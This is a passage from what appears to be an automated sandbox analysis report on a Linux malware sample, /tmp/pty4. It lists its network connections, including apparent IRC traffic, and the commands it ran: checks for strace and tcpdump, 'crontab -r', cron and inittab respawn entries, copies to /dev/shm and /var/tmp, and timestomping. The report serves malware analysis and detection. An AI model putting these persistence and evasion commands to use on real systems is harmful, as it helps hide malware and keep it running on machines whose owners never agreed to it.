Dec 23, 2021 11:26:55.993947029 CET | 48042 | 8080 | 192.168.2.23 | 198.8.91.14 |
Dec 23, 2021 11:26:56.115650892 CET | 8080 | 48042 | 198.8.91.14 | 192.168.2.23 |
Dec 23, 2021 11:26:56.994074106 CET | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 |
Dec 23, 2021 11:26:57.270119905 CET | 8080 | 48714 | 156.67.220.165 | 192.168.2.23 |
Dec 23, 2021 11:26:57.271761894 CET | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 |
Dec 23, 2021 11:26:58.030802011 CET | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 |
Dec 23, 2021 11:26:58.307034969 CET | 8080 | 48714 | 156.67.220.165 | 192.168.2.23 |
Dec 23, 2021 11:26:58.307251930 CET | 8080 | 48714 | 156.67.220.165 | 192.168.2.23 |
Dec 23, 2021 11:26:58.307327986 CET | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 |
Dec 23, 2021 11:26:58.310981035 CET | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 |
Dec 23, 2021 11:26:58.587162018 CET | 8080 | 48714 | 156.67.220.165 | 192.168.2.23 |
Dec 23, 2021 11:26:58.587241888 CET | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 |
Dec 23, 2021 11:26:58.588644028 CET | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 |
Dec 23, 2021 11:26:58.904227972 CET | 8080 | 48714 | 156.67.220.165 | 192.168.2.23 |
Dec 23, 2021 11:26:58.904376984 CET | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 |
Dec 23, 2021 11:26:59.180529118 CET | 8080 | 48714 | 156.67.220.165 | 192.168.2.23 |
Dec 23, 2021 11:26:59.180576086 CET | 8080 | 48714 | 156.67.220.165 | 192.168.2.23 |
Dec 23, 2021 11:26:59.181150913 CET | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 |
Dec 23, 2021 11:27:08.101514101 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Dec 23, 2021 11:27:20.389602900 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Dec 23, 2021 11:27:24.485449076 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
Dec 23, 2021 11:27:49.061294079 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Dec 23, 2021 11:28:09.829783916 CET | 777 | 48812 | 23.95.222.119 | 192.168.2.23 |
Dec 23, 2021 11:28:09.830014944 CET | 48812 | 777 | 192.168.2.23 | 23.95.222.119 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 23, 2021 11:26:55.924426079 CET | 47783 | 53 | 192.168.2.23 | 1.1.1.1 |
Dec 23, 2021 11:26:55.976707935 CET | 53 | 47783 | 1.1.1.1 | 192.168.2.23 |
Dec 23, 2021 11:26:55.977072001 CET | 47783 | 53 | 192.168.2.23 | 1.1.1.1 |
Dec 23, 2021 11:26:55.993489027 CET | 53 | 47783 | 1.1.1.1 | 192.168.2.23 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Dec 23, 2021 11:26:55.924426079 CET | 192.168.2.23 | 1.1.1.1 | 0x2e6a | Standard query (0) | A (IP address) | IN (0x0001) | |
Dec 23, 2021 11:26:55.977072001 CET | 192.168.2.23 | 1.1.1.1 | 0x2e6a | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Dec 23, 2021 11:26:55.976707935 CET | 1.1.1.1 | 192.168.2.23 | 0x2e6a | Name error (3) | none | none | A (IP address) | IN (0x0001) | |
Dec 23, 2021 11:26:55.993489027 CET | 1.1.1.1 | 192.168.2.23 | 0x2e6a | Name error (3) | none | none | A (IP address) | IN (0x0001) |
IRC Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
---|---|---|---|---|---|
Dec 23, 2021 11:26:58.030802011 CET | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 | |
Dec 23, 2021 11:26:58.904376984 CET | 48714 | 8080 | 192.168.2.23 | 156.67.220.165 |
System Behavior |
---|
General |
---|
Start time: | 11:26:48 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | /tmp/pty4 |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:48 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:48 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "pidof -x strace > /dev/null" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:48 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:48 |
Start date: | 23/12/2021 |
Path: | /usr/bin/pidof |
Arguments: | pidof -x strace |
File size: | 27016 bytes |
MD5 hash: | f58f67968fc50f1497f9ea9e9c22b6e8 |
General |
---|
Start time: | 11:26:51 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:51 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "pidof -x tcpdump > /dev/null" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:51 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:51 |
Start date: | 23/12/2021 |
Path: | /usr/bin/pidof |
Arguments: | pidof -x tcpdump |
File size: | 27016 bytes |
MD5 hash: | f58f67968fc50f1497f9ea9e9c22b6e8 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "crontab -r" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab -r |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "crontab -l | grep /tmp/pty4 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/pty4 > /dev/null 2>&1 &\") | crontab -" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep /tmp/pty4 |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep -v "no cron" |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab - |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cat /etc/inittab | grep -v \"/tmp/pty4\" > /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cat |
Arguments: | cat /etc/inittab |
File size: | 43416 bytes |
MD5 hash: | 7e9d213e404ad3bb82e4ebb2e1f2c1b3 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep -v /tmp/pty4 |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "echo \"0:2345:respawn:/tmp/pty4\" >> /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cat /etc/inittab2 > /etc/inittab" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cat |
Arguments: | cat /etc/inittab2 |
File size: | 43416 bytes |
MD5 hash: | 7e9d213e404ad3bb82e4ebb2e1f2c1b3 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "rm -rf /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /usr/bin/rm |
Arguments: | rm -rf /etc/inittab2 |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "touch -acmr /bin/ls /etc/inittab" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /usr/bin/touch |
Arguments: | touch -acmr /bin/ls /etc/inittab |
File size: | 100728 bytes |
MD5 hash: | 3859c173f5d3b37be3e531b7c84a9c68 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cp -f /tmp/pty4 /dev/shm/pty4" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cp |
Arguments: | cp -f /tmp/pty4 /dev/shm/pty4 |
File size: | 153976 bytes |
MD5 hash: | 40f10ae7ea3e44218d1a8c306f79c83f |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "crontab -l | grep /dev/shm/pty4 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/pty4 > /dev/null 2>&1 &\") | crontab -" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep /dev/shm/pty4 |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep -v "no cron" |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab - |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cat /etc/inittab | grep -v \"/dev/shm/pty4\" > /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cat |
Arguments: | cat /etc/inittab |
File size: | 43416 bytes |
MD5 hash: | 7e9d213e404ad3bb82e4ebb2e1f2c1b3 |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep -v /dev/shm/pty4 |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "echo \"0:2345:respawn:/dev/shm/pty4\" >> /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cat /etc/inittab2 > /etc/inittab" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cat |
Arguments: | cat /etc/inittab2 |
File size: | 43416 bytes |
MD5 hash: | 7e9d213e404ad3bb82e4ebb2e1f2c1b3 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "rm -rf /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/rm |
Arguments: | rm -rf /etc/inittab2 |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "touch -acmr /bin/ls /etc/inittab" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/touch |
Arguments: | touch -acmr /bin/ls /etc/inittab |
File size: | 100728 bytes |
MD5 hash: | 3859c173f5d3b37be3e531b7c84a9c68 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cp -f /tmp/pty4 /var/tmp/pty4" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cp |
Arguments: | cp -f /tmp/pty4 /var/tmp/pty4 |
File size: | 153976 bytes |
MD5 hash: | 40f10ae7ea3e44218d1a8c306f79c83f |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "crontab -l | grep /var/tmp/pty4 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/pty4 > /dev/null 2>&1 &\") | crontab -" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep /var/tmp/pty4 |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep -v "no cron" |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab - |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cat /etc/inittab | grep -v \"/var/tmp/pty4\" > /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cat |
Arguments: | cat /etc/inittab |
File size: | 43416 bytes |
MD5 hash: | 7e9d213e404ad3bb82e4ebb2e1f2c1b3 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep -v /var/tmp/pty4 |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
